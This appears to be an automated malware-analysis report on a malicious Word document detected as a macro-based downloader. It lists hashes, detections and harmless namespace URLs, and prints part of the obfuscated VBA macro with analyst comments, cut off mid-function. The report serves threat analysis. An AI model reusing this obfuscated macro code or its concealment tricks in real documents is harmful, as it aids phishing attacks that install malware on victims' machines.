Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fb82fd4534d7c32a…

MALICIOUS

Office (OLE)

Size: 184.5 KB · Created: 2018-05-02 20:50:00 (taken from the document's own OLE metadata, which the author controls, so not a reliable timestamp) · Authoring application: Microsoft Office Word (self-reported) · First seen: 2019-01-11
MD5: bdce6d8e2110cd49c9d923f1e6c7503d SHA-1: 8f78ffbb5b40c456abeaf6acb9c2a5afc99190ef SHA-256: fb82fd4534d7c32a3de8523fde2d59b7c26146eae1827c0b4202630e3004c587
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1566.001 — Phishing: Spearphishing Attachment

ClamAV identifies the file as malicious with the signature Doc.Downloader.Macro-6539595-0, i.e. a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the document's primary purpose is to execute code as soon as it is opened. The VBA is obfuscated (junk arithmetic, unused Pmt/Rnd calls, conditional-compilation blocks keyed on Win64), and the download-and-execute behaviour is inferred from the signature and the macro's structure rather than from a URL visible in the code: no download address appears in the extracted-code preview below, so the payload location should be confirmed by deobfuscating the full 12,720-byte macro or by dynamic analysis.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below are W3C RDF, Dublin Core and Adobe XMP schema namespace identifiers, which typically come from the metadata of an embedded image rather than from the macro, and should not be treated as network indicators.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12720 bytes
SHA-256: 5efd1574aa0c79c5df1b8b6c547265d130c512a8a3ab82fa1299c2f8e041c61e
Preview script
First 1,000 lines of the extracted script (the rendering below is cut short at the "... (truncated)" marker, inside the function bells)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: the eight Attribute lines above are the module header of the
' ThisDocument class module as written by the olevba export that produced
' macros.bas. They describe the module, not the malicious logic, which starts
' at the first Function below.
' Analyst notes (documentation only; code left byte-identical to the carved artifact).
' tagasaste(brambling, monestrous, meatball): copies its three arguments into
' Long locals and forwards them to `lady`; the effective call is
'   lady ByVal -1, brambling, monestrous, meatball, 0
' (fluorite = 51 - 101 + 49 = -1; melampsoraceae is declared but never
' assigned, so it is 0). `lady` is not defined anywhere in this excerpt —
' presumably a Declare'd external routine; confirm from the full macro.
' No return value is assigned, so the function returns Empty. Everything else
' in the body (Rnd, Fix, Pmt, the string and arithmetic assignments) discards
' its result. spirituality() further down makes the same call via a second wrapper.
Function tagasaste(brambling, monestrous, meatball)
Dim actinomyces As Long
Dim tamely As Variant
Dim fluorite As Long
Dim embers As Variant
Dim elsholtzia As Long
Dim redcoat As Variant
Dim melampsoraceae As Long
Dim tinca As Variant
Dim adorable As Long
Dim delonix As String
Dim arithmancy As Byte
' cimarron is never declared (no Option Explicit visible); it is overwritten on
' the next line and never read again.
cimarron = cimarron / 167
cimarron = Rnd(369)
actinomyces = brambling
adorable = meatball
nitid = Rnd(477)
elsholtzia = monestrous
phocaena = 44 + 22
' Pmt invoked as a statement: the financial-function result is thrown away.
Pmt 0, phocaena, 25097, 47104, 2
mete = "neuromotor"
fluorite = 51 - 101 + 49
' The only line with an observable effect: arguments forwarded to the external routine.
lady ByVal fluorite, actinomyces, elsholtzia, adorable, melampsoraceae
nitid = Fix(307)
End Function
' Analyst notes (documentation only; code left byte-identical to the carved artifact).
' apt(): the one visible routine that moves data between the external pieces.
' Data flow: worth.majeure (not defined in this excerpt; the .Value/.SelectedItem/
' .Name accesses suggest a form control) -> selected item's .Name ->
' hardliner.occasionem() -> bells() (begins at the end of the preview, body cut
' off) -> begonia -> fissurellidae(...). `worth`, `hardliner`, `fissurellidae`
' and `lady` are not declared in the visible preview, and the Document_Open
' entry point flagged by OLE_VBA_DOCOPEN is also outside the visible lines, so
' what calls apt() cannot be seen here. Every Pmt call, the string assignments
' and most of the arithmetic discard their results (obfuscation padding).
Sub apt()
Dim swishing As Variant
Dim casablanca As Long
' #12/5/2013# is a VBA date literal (month/day/year), so Day() yields 5.
worth.majeure.Value = Day(#12/5/2013#)
' Equality test between two undeclared names, stored in a third; never read.
varday = lackbrain = actionable
hackee = "centenary"
chancellorship = cato
blended = harebell
doubly = "profoundly"
idealization = "ditheism"
attacker = "atomization"
' NOTE(review): the data the rest of the routine transforms appears to live in
' a form control item (its .Name), not in the code itself — confirm by
' inspecting the document's UserForm streams.
Set cloak = worth.majeure.SelectedItem
volva = 36 + 10
Pmt 0, volva, 3692, 36111, 4
dipodomys = cloak.Name
' 117 - 114 + 7841 = 7844; Right(s, n) with n >= Len(s) returns s unchanged,
' so distributor is simply the item name.
churlishly = 117 - 114 + 7841
distributor = Right(dipodomys, churlishly)
ant = hardliner.occasionem(distributor)
maxillaria = 27 + 15
Pmt 0, maxillaria, 28216, 28779, 8
informal = "empyreal"
' Conditional compilation: the first clause (700 > -220) is True in both arms,
' and the second clause reduces to `0 < Win64`, which is False whether Win64 is
' 0 (32-bit Office) or -1 (64-bit) — so by this arithmetic the #If arm
' (LongPtr) is never compiled and the #ElseIf arm (Long) always is. Re-check.
#If (126 - 7 + 281 + 103 - 121 + 318) > ((70 - 36 + 286) - (26 - 23 + 537) * 1) And ((113 - 71 - 14) - (79 - 32 - 19)) * 2 < (Win64) Then
Dim statistic As Variant
Dim enteric As LongPtr
Dim begonia As LongPtr
Dim mica As Variant
#ElseIf (19 - 26 + 407 + 26 - 22 + 296) > ((86 - 18 + 252) - (27 - 59 + 572) * 1) And Not ((47 - 66 + 47) - (113 - 74 - 11)) * 2 < (Win64) Then
Dim dryden As String
Dim begonia As Long
Dim neurosarcoma As String
Dim enteric As Long
#End If
carboniferous = 95 - 97 + 2
compassionate = "valediction"
accrust = 10 - 51 + 4137
austerely = 24 + 23
 Pmt 0, austerely, 9585, 17386, 2

prisons = agathis
hoi = "messalina"
hardware = dig
schooling = "incombustible"
fettuccine = 3 + 25
 Pmt 0, fettuccine, 32062, 47578, 3

' The transformed item name is passed to bells(); see the truncated function
' at the end of the preview.
ningal = ant
fertile = "zerronnen"
maniple = bota
enteric = bells(ningal)
katharometer = adaption
paixhan = "sprout"
' Same #If/#ElseIf pattern as above; only the second arm compiles, giving
' podiatry = (118 - 47 + 710) + 3459 = 4240 (the first arm would give 2064).
#If (5 - 2 + 397 + 101 - 22 + 221) > ((4 - 51 + 367) - (11 - 63 + 592) * 1) And ((110 - 27 - 55) - (41 - 54 + 41)) * 2 < (Win64) Then
Dim arrectis As Variant
Dim confute As LongPtr
Dim heist As LongPtr
Dim fur As LongPtr
podiatry = 63 - 124 + 2125
#ElseIf (55 - 19 + 364 + 120 - 6 + 186) > ((84 - 111 + 347) - (126 - 9 + 423) * 1) And Not ((68 - 73 + 33) - (18 - 115 + 125)) * 2 < (Win64) Then
Dim confute As Long
aculeate = 118 - 47 + 710
Dim heist As Long
Dim fur As Long
podiatry = aculeate + 3459

#End If
Dim forelay As Integer
Dim unornamented As String
' confute = 0, heist = 201527, fur = 3500 (fur is not used again in the visible code).
confute = 94 - 49 - 45
begonia = enteric + podiatry
heist = 16 - 104 + 201615
fur = 72 - 89 + 3517
' Seven-argument call to an external routine not declared in this excerpt:
' fissurellidae(201527, 0, bells(...) + 4240, 0, 0, 0, 0). The return value is
' stored in an undeclared name and not used within the visible code.
artificially = fissurellidae(heist, confute, begonia, confute, confute, confute, confute)
aguardiente = 6 + 29
 Pmt 0, aguardiente, 32627, 32363, 7

End Sub

' Analyst notes (documentation only; code left byte-identical to the carved artifact).
' spirituality(carambola, piquancy, crystallized): a second wrapper around the
' same external `lady` call that tagasaste() makes; the effective call is
'   lady ByVal -1, carambola, piquancy, crystallized, 0
' (divorcement = 45 - 91 + 45 = -1; mornful is declared LongPtr but never
' assigned). `lady` is not declared in this excerpt. `diarist = diarist` is a
' no-op, and `mete` is assigned but never used here — unless `mete` is Dim'd at
' module level outside this excerpt, each procedure's `mete` is an implicit
' local and is not shared with tagasaste(). No return value is assigned.
' Unlike apt(), LongPtr is used here unconditionally rather than behind a
' Win64 conditional-compilation check.
Function spirituality(carambola, piquancy, crystallized)
Dim furioso As Variant
Dim alligatorfish As Integer
Dim divorcement As LongPtr
Dim latchkey As LongPtr
Dim mornful As LongPtr
Dim argentinosaur As Long
Dim jab As LongPtr
Dim fiddleneck As LongPtr
nitid = Rnd(443)
diarist = diarist
latchkey = carambola
fiddleneck = crystallized
diarist = diarist
jab = piquancy
burnout = 32 + 51
 Pmt 0, burnout, 29068, 16169, 8

diarist = mete
divorcement = 45 - 91 + 45
' Line-continued call (the `_` lines below belong to this statement); this is
' the only line with an observable effect in the function.
lady ByVal divorcement, _
latchkey, _
jab, fiddleneck, _
mornful
mete = "ordovician"
End Function
Function bells(screeen)
Dim cede As Variant
Dim editorship As Byte
Dim antilles As Byte
Dim manet As Integer
#If (26 - 88 + 462 + 123 - 52 + 229) > ((61 - 51 + 310) - (54 - 37 + 523) * 1) And ((36 - 105 + 97) - (52 - 123 + 99)) * 2 < (Win64) Then
D
... (truncated)